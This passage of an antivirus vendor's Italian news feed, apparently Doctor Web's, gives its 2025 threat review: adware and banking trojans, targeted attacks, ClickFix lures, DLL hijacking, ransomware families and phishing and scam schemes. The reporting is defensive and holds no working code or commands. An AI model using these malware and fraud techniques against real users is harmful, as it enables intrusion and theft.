Pertanto, la migliore variante per procurare a sé stessi e ai propri cari una tranquillità garantita è utilizzare Dr.Web Security Space per dispositivi mobili. Esso proteggerà non solo i vostri smartphone, ma anche altri dispositivi intelligenti: console di gioco, tablet, smart TV.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;Indicatori di compromissione&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.2.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.3&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.4.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
Maggiori informazioni su &lt;a href="https://vms.drweb-av.it/search/?q=Android.Phantom.5.origin&amp;lng=it"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb-av.it/show/?i=15102&amp;lng=it</guid><title>Doctor Web: panoramica sull'attività di virus per l'anno 2025</title><link>https://news.drweb-av.it/show/?i=15102&amp;lng=it&amp;c=5</link><pubDate>Thu, 15 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;15 gennaio 2026&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Nel 2025 una delle minacce più attive sono stati i trojan progettati per la visualizzazione della pubblicità. Gli utenti riscontravano anche i vari script malevoli ed applicazioni trojan che avviano nel sistema infetto altri malware. Nel traffico email con la maggiore frequenza venivano rilevati i programmi trojan downloader, backdoor, exploit, script malevoli e documenti di phishing.&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Tra le minacce mobili, sono stati i più diffusi i trojan pubblicitari e i programmi falsificazione utilizzati in vari schemi fraudolenti. Si registrava anche una crescita dell'attività dei trojan bancari. Oltre a questo, gli analisti dei virus Doctor Web hanno individuato decine di nuovi programmi malevoli, indesiderati e pubblicitari sullo store di app Google Play.&lt;/p&gt;

&lt;p&gt;Rispetto al 2024, è diminuito il numero di richieste degli utenti per la decriptazione di file. Allo stesso tempo, durante l'anno i nostri analisti internet registravano una crescita del numero di siti fraudolenti creati per rubare gli account utente del programma di messaggistica Telegram. Di nuovo erano diffusi anche i siti indesiderati a tema finanziario.&lt;/p&gt;

&lt;p&gt;Nel 2025 il laboratorio antivirus Doctor Web ha investigato diversi attacchi mirati, uno di cui era diretto a un'impresa metalmeccanica russa. Nel corso dell'attacco, i malintenzionati utilizzavano una serie di applicazioni malevole, con cui cercavano di ottenere dati confidenziali dai computer infetti. I nostri specialisti hanno stabilito che nell'attacco era coinvolto un gruppo di hacker chiamato Scaly Wolf. Un altro incidente ha interessato un ente pubblico russo che è stato attaccato da un gruppo di hacker con il nome Cavalry Werewolf. Gli analisti dei virus Doctor Web hanno individuato numerosi strumenti malevoli dei malintenzionati, nonché hanno esaminato le caratteristiche del gruppo e le azioni tipiche di esso all'interno di reti compromesse.&lt;/p&gt;

&lt;p&gt;Durante il 2025, l'azienda Doctor Web ha riferito una serie di altri incidenti di sicurezza informatica. A gennaio il nostro laboratorio dei virus ha individuato un'attiva campagna di mining della criptovaluta Monero, organizzata con l'impiego di molteplici programmi malevoli di vario genere. E ad aprile abbiamo informato di un trojan trovato nel firmware di una serie di modelli di smartphone Android. Tramite di esso i cybercriminali rubavano criptovalute. Inoltre, ad aprile i nostri specialisti hanno individuato un trojan Android che i malintenzionati avevano inserito in una delle versioni di un popolare programma cartografico e utilizzavano per spiare i militari russi.&lt;/p&gt;

&lt;p&gt;A luglio gli esperti Doctor Web hanno parlato di una nuova famiglia di trojan creati per rubare criptovalute e password. I malintenzionati li distribuivano con il pretesto di mod, cheat e patch per giochi. Ad agosto gli analisti dei virus hanno avvertito della diffusione di un backdoor multifunzionale per dispositivi mobili, che era mirato ai rappresentanti del business russo. I criminali informatici lo gestivano in remoto, rubando per il suo tramite dati confidenziali e spiando le vittime.&lt;/p&gt;

&lt;p&gt;Ad ottobre abbiamo raccontato di un backdoor per dispositivi Android, che i cybercriminali distribuiscono come parte di versioni modificate del programma di messaggistica Telegram X. Questo programma malevolo ruba i login e le password degli account Telegram e anche altri dati confidenziali. Per il suo tramite, gli attori di minacce possono gestire gli account hackerati delle vittime e controllare completamente il programma di messaggistica stesso, effettuando varie azioni a nome degli utenti.&lt;/p&gt;

&lt;p&gt;A dicembre sul nostro sito web è stato pubblicato un materiale su un trojan che "gonfia" la popolarità di siti, e per questo scopo si finge umano dimodoché le sue attività non vengano bloccate dalla protezione antibot delle piattaforme internet. Il programma malevolo cerca in autonomo i siti necessari nei motori di ricerca, li apre ed esegue clic sulle pagine web in base ai parametri ricevuti dai malintenzionati.&lt;/p&gt;

&lt;p&gt;Nel 2025 c'è stato anche un aumento della popolarità degli attacchi ClickFix, in cui i malintenzionati utilizzano il social engineering per indurre gli utenti ad eseguire un codice malevolo sui loro dispositivi.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Principali tendenze dell'anno&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Si registrava un'alta attività dei trojan pubblicitari&lt;/li&gt;
        &lt;li&gt;Avvenuti nuovi attacchi mirati&lt;/li&gt;
        &lt;li&gt;Si osservava una crescita della popolarità degli attacchi con l'uso del metodo ClickFix&lt;/li&gt;
        &lt;li&gt;Diminuito il numero di incidenti con i programmi trojan ransomware di criptazione&lt;/li&gt;
        &lt;li&gt;Aumentato il numero di rilevamenti dei trojan bancari per Android&lt;/li&gt;
        &lt;li&gt;Rivelati nuovi casi di infezione dei firmware di dispositivi Android&lt;/li&gt;
        &lt;li&gt;Sullo store Google Play di nuovo venivano distribuiti programmi malevoli e indesiderati&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Eventi più interessanti del 2025&lt;/h3&gt;

&lt;p&gt;A gennaio 2025 gli specialisti Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=14976" target="_blank"&gt;hanno individuato&lt;/a&gt; una campagna di mining della criptovaluta Monero effettuata con l'utilizzo del cryptominer malevolo SilentCryptoMiner. I suoi file erano camuffati da vari software, ad esempio, programmi per videochiamate. Infettando i computer, essi eliminavano altri cryptominer che potevano essere stati precedentemente installati nel sistema. In questa campagna, per la distribuzione di alcuni componenti malevoli, i malintenzionati utilizzavano la steganografia — tecnica che consente di celare dati tra altri dati (ad esempio, in immagini). Dopo il download delle immagini appositamente formate, i componenti corrispondenti di SilentCryptoMiner venivano estratti da esse e avviati.&lt;/p&gt;

&lt;p&gt;Ad aprile i nostri analisti dei virus &lt;a href="https://news.drweb-av.it/show/?i=15002" target="_blank"&gt;hanno informato&lt;/a&gt; di un trojan, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt;, rilevato nel firmware di una serie di modelli economici di smartphone Android. I malintenzionati l'avevano incorporato in una versione modificata dell'app di messaggistica WhatsApp, che quindi avevano preinstallato su dispositivi, compromettendo la catena di fornitura di alcuni produttori. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Clipper.31&amp;lng=it"&gt;&lt;b&gt;Android.Clipper.31&lt;/b&gt;&lt;/a&gt; intercetta i messaggi inviati e ricevuti nell'app di messaggistica, cerca in essi indirizzi di portafogli delle criptovalute Tron ed Ethereum, e li sostituisce con indirizzi appartenenti ai cybercriminali. Allo stesso tempo, il trojan occulta la sostituzione furtiva, e le vittime vedono in tali messaggi gli indirizzi di portafogli corretti.&lt;/p&gt;

&lt;p&gt;Lo stesso mese, gli esperti Doctor Web hanno individuato un trojan Android, chiamato &lt;a href="https://vms.drweb-av.it/search/?q=Android.Spy.1292.origin&amp;lng=it"&gt;&lt;b&gt;Android.Spy.1292.origin&lt;/b&gt;&lt;/a&gt;, che i malintenzionati avevano incorporato in una delle versioni del programma cartografico Alpine Quest e utilizzavano per spiare i militari russi. L'applicazione malevola raccoglieva informazioni confidenziali e consentiva agli attaccanti di rubare file dai dispositivi infetti.&lt;/p&gt;

&lt;p&gt;A luglio sul sito dell'azienda Doctor Web è stato pubblicato un &lt;a href="https://news.drweb-av.it/show/?i=15036" target="_blank"&gt;materiale&lt;/a&gt; sui programmi trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.Scavenger&amp;lng=it"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt;, progettati il furto di criptovalute e password. I malintenzionati li distribuivano con il pretesto di mod, cheat e patch per giochi. Queste applicazioni malevole venivano avviate con l'utilizzo di software legittimi, tra l'altro, tramite lo sfruttamento in essi delle vulnerabilità di classe DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;Ad agosto i nostri specialisti &lt;a href="https://news.drweb-av.it/show/?i=15047" target="_blank"&gt;hanno avvisato&lt;/a&gt; della diffusione di un backdoor multifunzionale, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, che era mirato ai rappresentanti di aziende russe. L'applicazione malevola sotto le apparenze di un antivirus si diffondeva tramite messaggi privati nelle applicazioni di messaggistica. Entrando nei dispositivi target, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.916.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; raccoglieva dati confidenziali e permetteva agli attaccanti di spiare le vittime.&lt;/p&gt;

&lt;p&gt;Oltre a ciò, ad agosto il laboratorio antivirus Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15046" target="_blank"&gt;ha pubblicato un'indagine&lt;/a&gt; su un attacco mirato effettuato da un gruppo di hacker, Scaly Wolf, a un'impresa metalmeccanica russa. I cybercriminali hanno utilizzato un intero set di strumenti malevoli, tra cui uno dei principali è stato un backdoor modulare Updatar. Consentiva agli attaccanti di raccogliere dati riservati dai computer infetti.&lt;/p&gt;

&lt;p&gt;Ad ottobre gli esperti Doctor Web &lt;a href="https://news.drweb-av.it/show/?i=15076" target="_blank"&gt;hanno parlato&lt;/a&gt; di un backdoor, &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;, incorporato in versioni modificate dai malintenzionati del programma di messaggistica Telegram X. &lt;a href="https://vms.drweb-av.it/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=it"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; ruba i login e le password degli account Telegram, nonché sottrae una serie di altri dati confidenziali. Il programma malevolo consente ai malintenzionati di ottenere il completo controllo dell'account dell'utente e gestire il programma di messaggistica eseguendo in esso azioni a nome della vittima. Ad esempio, gli attaccanti possono impercettibilmente aderire a canali Telegram e abbondonarli, nonché nascondere nuovi dispositivi autorizzati nell'interfaccia della modificazione trojan di Telegram X.&lt;/p&gt;

&lt;p&gt;A novembre abbiamo pubblicato uno &lt;a href="https://news.drweb-av.it/show/?i=15078" target="_blank"&gt;studio&lt;/a&gt; di un attacco mirato di un gruppo di hacker, Cavalry Werewolf, a un ente pubblico russo. Analizzando l'incidente, gli esperti Doctor Web hanno individuato numerosi strumenti malevoli dei cybercriminali, inclusi strumenti a codice sorgente aperto. Gli analisti dei virus hanno esaminato le caratteristiche del gruppo di hacker e hanno scoperto che i suoi partecipanti preferiscono utilizzare backdoor con la funzionalità di reverse shell e spesso adoperano Telegram API per la gestione dei computer infetti. Inoltre, iniziano gli attacchi inviando email di phishing presumibilmente a nome di enti pubblici e allegando a tali messaggi software malevoli mascherati da vari documenti ufficiali.&lt;/p&gt;

&lt;p&gt;A dicembre l'azienda Doctor Web ha pubblicato &lt;a href="https://news.drweb-av.it/show/?i=15090" target="_blank"&gt;un'analisi&lt;/a&gt; di un'applicazione malevola, &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.ChimeraWire&amp;lng=it"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;, che aumenta artificialmente la popolarità di siti fingendo di essere una persona. L'applicazione trojan cerca in autonomo i siti necessari nei motori di ricerca Google e Bing, li apre ed esegue clic sulle pagine web caricate in base ai compiti ricevuti dai malintenzionati. &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.ChimeraWire&amp;lng=it"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; viene installato sui computer con l'ausilio di una serie di programmi malevoli che sfruttano le vulnerabilità di classe DLL Search Order Hijacking.&lt;/p&gt;

&lt;p&gt;Durante il 2025, si osservava una crescita della popolarità degli attacchi con l'utilizzo del metodo ClickFix. Consiste in quello che i malintenzionati sfruttano il social engineering spingendo con inganno le potenziali vittime ad eseguire autonomamente un codice malevolo. Quando gli utenti vanno su un sito malevolo o compromesso, quest'ultimo li informa di un presunto errore o della necessità di aggiornare il browser e suggerisce di "risolvere" il problema. Per questo scopo, a secondo della variante di attacco, agli utenti viene chiesto o di copiare le stringhe indicate sulla pagina o di cliccare semplicemente sul pulsante corrispondente (ad esempio, "Aggiorna" o "Risolvi"). In quest'ultimo caso, il contenuto richiesto verrà automaticamente copiato negli appunti. Quindi viene chiesto a loro di aprire il prompt dei comandi o il terminale PowerShell, incollare in esso il contenuto degli appunti e premere il tasto Invio. Come risultato, le vittime eseguono autonomamente un codice malevolo, il quale avvia una catena di infezione del computer. Maggiori informazioni sugli attacchi ClickFix possono essere trovate nel &lt;a href="https://news.drweb-av.it/show/?i=15074" target="_blank"&gt;materiale&lt;/a&gt; corrispondente sul nostro sito.&lt;/p&gt;

&lt;h3&gt;Situazione di virus&lt;/h3&gt;

&lt;p&gt;Secondo i dati delle statistiche di rilevamento dell'antivirus Dr.Web, nel 2025 il numero totale di minacce rilevate è cresciuto del 5,45% rispetto al 2024. Il numero di minacce uniche è diminuito del 15,89%. Il più spesso gli utenti affrontavano i vari script malevoli e i trojan pubblicitari. Inoltre, risultavano diffusi i trojan utilizzati per l'avvio di altri programmi malevoli. Gli utenti di nuovo riscontravano anche le applicazioni trojan create in linguaggio di scripting AutoIt e distribuite come parte di altri malware per la complicazione del loro rilevamento.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/01_stat_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.6&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo che in ciclo infinito cerca finestre con il testo &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt; e &lt;span class="string"&gt;розробника&lt;/span&gt; e invia ad esse un evento di clic sul pulsante Escape, chiudendole forzatamente.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.BPlug.4242&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di un componente malevolo di un'estensione browser WinSafe. Questo componente rappresenta uno script JavaScript che visualizza pubblicità invadenti nei browser.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8319&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8326&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Starter.8332&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di script XML malevoli che avviano il trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; e i suoi componenti.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb-av.it/search/?q=JS.Siggen5.44590&amp;lng=it"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
    &lt;dd&gt;Codice malevolo aggiunto a una libreria JavaScript pubblica es5-ext-main. Visualizza un messaggio specifico se il pacchetto è installato su un server con un fuso orario di città russe.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen30.53926&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Processo host di un framework Electron modificato dai malintenzionati, che si mimetizza da componente dell'applicazione Steam (Steam Client WebHelper) e carica un backdoor JavaScript.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.MalVpn.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo utilizzato da vari programmi malevoli per la connessione ai server di comando e controllo.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan scritto nel linguaggio di programmazione Go e studiato per caricare nel sistema di destinazione vari cryptominer e software pubblicitari. Il programma malevolo è un file DLL e si trova in &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. Per avviarsi, sfrutta la vulnerabilità di classe DLL Search Order Hijacking nel client torrent uTorrent.&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;Nel traffico email nel 2025 venivano riscontrati con la maggiore frequenza i programmi trojan che scaricavano e installavano altri malware. I malintenzionati distribuivano tramite messaggi email anche i vari backdoor, exploit, documenti di phishing e script malevoli.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/02_email_traffic_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Famiglia di trojan downloader che utilizzano vulnerabilità in documenti Microsoft Office. Sono studiati per scaricare altri programmi malevoli sul computer attaccato.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Exploit per l'utilizzo di vulnerabilità nel software Microsoft Office, che consentono di eseguire codice arbitrario.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.684&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Script malevolo nel linguaggio JavaScript che genera una pagina web di phishing.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;BackDoor.AgentTeslaNET.20&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programma malevolo spia studiato per il furto di informazioni confidenziali. Ad esempio, raccoglie e trasmette ai malintenzionati i login e le password da numerose applicazioni, come browser, programmi di messaggistica, client di posta, database ecc. Anche ruba dati dagli appunti, realizza la funzionalità di keylogger e può catturare schermate (screenshot).&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Win32.Expiro.153&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Virus di file che infetta file eseguibili Windows. Il suo scopo principale consiste nel furto di password da vari programmi.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;JS.DownLoader.1225&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento euristico per gli archivi ZIP contenenti script JavaScript con nomi sospetti.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.PackedNET.3223&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di programmi malevoli protetti tramite packer.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.AutoIt.1413&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Rilevamento di una versione impacchettata del programma trojan &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; scritto nel linguaggio di script AutoIt. Viene distribuita come parte di un gruppo di diverse applicazioni malevole: un cryptominer, un backdoor e un modulo per la distribuzione autonoma. &lt;a href="https://vms.drweb-av.it/search/?q=Trojan.AutoIt.289&amp;lng=it"&gt;&lt;b&gt;Trojan.AutoIt.289&lt;/b&gt;&lt;/a&gt; esegue varie azioni malevole che ostacolano il rilevamento del payload principale.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Ransomware di criptazione&lt;/h3&gt;

&lt;p&gt;Rispetto al 2024, nel 2025 le richieste degli utenti interessati dai programmi trojan ransomware di criptazione pervenuti al Servizio di supporto tecnico Doctor Web sono state il 35,98% in meno. La dinamica di registrazione delle richieste di decriptazione di file è presentata sul diagramma sotto.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/03_encoder_requests_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;I ransomware di criptazione più diffusi nel 2025&lt;/p&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; &lt;span class="font-normal"&gt;(23,22% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Ransomware di criptazione anche conosciuto come Mimic. Durante la ricerca dei file target da criptare, il trojan utilizza la libreria [string]everything.dll[/string] del programma legittimo Everything, progettato per la ricerca istantanea di file su computer Windows.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt; &lt;span class="font-normal"&gt;(3,33% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Ransomware di criptazione basato sul codice sorgente del trojan encoder Conti. Cripta i file tramite l'algoritmo ChaCha20. Dopo la liquidazione di una serie di server di comando e controllo dei malintenzionati e la divulgazione delle chiavi di crittografia RSA private, per alcune varianti di questo programma malevolo è disponibile la decriptazione dei file colpiti.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; &lt;span class="font-normal"&gt;(2,50% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Ransomware di criptazione conosciuto come Macop (una delle varianti di questo trojan è &lt;b&gt;Trojan.Encoder.30572&lt;/b&gt;). Ha dimensioni ridotte, di circa 30-40 Kbyte. Questo è in parte dovuto al fatto che il trojan non porta con sé librerie crittografiche di terze parti, e per la criptazione e la generazione delle chiavi si avvale esclusivamente delle funzioni CryptoAPI. Per la criptazione di file utilizza l'algoritmo AES-256, e le chiavi stesse vengono cifrate tramite RSA-1024.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.41868&lt;/b&gt; &lt;span class="font-normal"&gt;(2,31% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Ransomware di criptazione, gli artefatti in cui indicano il coinvolgimento nella sua creazione del gruppo di hacker C77L.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt; &lt;span class="font-normal"&gt;(2,13% di richieste utente)&lt;/span&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan ransomware che ha più versioni. Le sue varianti attuali criptano i file con l'algoritmo AES-256+RSA.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Frode online&lt;/h3&gt;

&lt;p&gt;Nel 2025 gli analisti internet dell'azienda Doctor Web osservavano una crescita del numero di siti di phishing creati per il furto degli account del programma di messaggistica Telegram. I malintenzionati adoperavano vari schemi: false pagine di autenticazione e autorizzazione, falsi messaggi dal servizio di supporto Telegram che avvisavano di presunte violazioni identificate durante l'uso del programma di messaggistica e della necessità di eseguire una "verifica" dell'account ecc.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/04_scam_01_telegram_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di sito di phishing che informa della necessità di eseguire una verifica dell'account Telegram in relazione a una certa violazione delle condizioni di uso del servizio&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;I simili siti venivano creati anche per gli utenti di altri servizi web, ad esempio, piattaforme di gioco, negozi online ecc. Le falsificazioni potevano avere l'aspetto delle vere risorse internet e suggerivano di eseguire l'accesso all'account. Se gli utenti cadevano nella trappola, le informazioni confidenziali finivano nelle mani dei malintenzionati.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/05_fake_steam_login_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Falso sito del servizio Steam visualizza un modulo di phishing per l'inserimento di login e password&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Gli utenti di nuovo riscontravano varianti di vario genere di risorse internet fraudolente che offrivano tutti i tipi di omaggi e buoni, la partecipazione a certe "promozioni vantaggiose". Risultavano diffusi i falsi siti dei marketplace russi, dove gli visitatori presumibilmente potrebbero partecipare a un'estrazione a premi. La vincita su tali siti era programmata in anticipo, mentre per "riceverla", alla vittima veniva chiesto di effettuare un determinato pagamento, ad esempio, sotto forma di presunta imposta, e quindi per la consegna della merce e la sua assicurazione. In altre varianti dello schema fraudolento, la merce richiesta presumibilmente non sarebbe disponibile, ma invece di essa verrebbe offerto l'equivalente in denaro. Per "ricevere" i soldi, l'utente anche doveva effettuare una serie di pagamenti: sotto forma di una tassa, un'assicurazione ecc. Alla fine la vittima non riceveva alcun premio.&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/06_fake_market_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Esempio di falso sito di marketplace che suggerisce di partecipare a "un'estrazione a premi"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Varianti di tali schemi erano i falsi siti di compagnie di trasporto rivolti agli abitanti di Regno Unito. Invitavano a partecipare all'estrazione di carte trasporti che presumibilmente sarebbero correlati a un determinato evento e consentirebbero di usare gratis i servizi di trasporto pubblico. Dopo che le vittime "vincevano", i truffatori chiedevano a loro di fornire i dati personali e pagare una piccola "commissione".&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/january/review_common/07_scam_transportcard_2025.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Sito truffa che presumibilmente a nome di una compagnia di trasporto suggerisce di partecipare a "un'estrazione della carta"&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Rimanevano attuali gli svariati siti fraudolenti a tema finanziario. Di nuovo erano popolari tra i malintenzionati le risorse che suggerivano di guadagnare con il trading con l'utilizzo di sistemi automatizzati basati su certi algoritmi unici e tecnologie di intelligenza artificiale. I simili siti vengono creati per abitanti di molti paesi. Il più spesso, su di essi vengono chiesti i dati personali per registrare "la richiesta" o "l'account", dopodiché le informazioni finiscono nelle mani dei malintenzionati che le utilizzano a loro discrezione. Successivamente loro possono rivendere i dati o continueranno ad attirare le potenziali vittime verso il falso servizio di investimento, chiedendo di versare denaro sul conto di "trading".&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/january/review_common/08_scam_appleAI_trade_2025.png" data-fancybox&gt;
